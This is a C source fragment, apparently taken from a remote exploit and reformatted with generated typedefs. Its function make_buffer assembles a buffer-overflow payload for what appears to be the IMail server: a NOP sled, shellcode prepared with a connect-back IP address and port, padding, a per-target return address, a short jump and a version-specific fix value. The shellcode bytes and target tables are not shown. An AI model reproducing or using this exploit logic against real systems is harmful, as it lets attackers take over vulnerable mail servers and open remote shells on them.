
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


typedef int buf ;
struct TYPE_6__ {int fix; } ;
struct TYPE_5__ {char* shellcode; } ;
struct TYPE_4__ {int ret; } ;


 TYPE_3__* imailfix ;
 unsigned char* jmpcode ;
 scalar_t__ malloc (int) ;
 int memcpy (unsigned char*,unsigned char*,int) ;
 int memset (unsigned char*,char,int) ;
 int prepare_shellcode (unsigned char*,int,char*,int) ;
 TYPE_2__* shellcodes ;
 int strlen (char*) ;
 TYPE_1__* targets ;

void make_buffer(unsigned char * buf, int itarget, int sh, char * cbip, int cbport, int ifix)
{

 unsigned char * fsh;
 fsh = (unsigned char *) malloc ((strlen(shellcodes[sh].shellcode)+1) );
 memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1));
 prepare_shellcode(fsh, sh, cbip, cbport);



 memset(buf,0,sizeof(buf));
 unsigned char * cp = buf;
 *cp++ = '@';
 *cp++ = '\x90';
 *cp++ = '\x90';
 *cp++ = '\x90';
 *cp++ = '\x90';


 memcpy(cp, fsh, strlen((char *)fsh) );
 cp+=strlen((char *)cp);
 memset(cp, 'A', 488-strlen((char *)fsh));
 cp+=strlen((char *)cp);

 *cp++ = (unsigned char)((targets[itarget].ret ) & 0xff);
 *cp++ = (unsigned char)((targets[itarget].ret >> 8) & 0xff);
 *cp++ = (unsigned char)((targets[itarget].ret >> 16) & 0xff);
 *cp++ = (unsigned char)((targets[itarget].ret >> 24) & 0xff);

 *cp++ = '\x41';
 *cp++ = '\x41';
 *cp++ = '\x41';
 *cp++ = '\xeb';
 *cp++ = '\x03';
 *cp++ = (unsigned char)((imailfix[ifix].fix >> 8) & 0xff);
 *cp++ = (unsigned char)((imailfix[ifix].fix >> 16) & 0xff);
 *cp++ = (unsigned char)((imailfix[ifix].fix >> 24) & 0xff);


 memcpy(cp, jmpcode, strlen((char *)jmpcode));

}
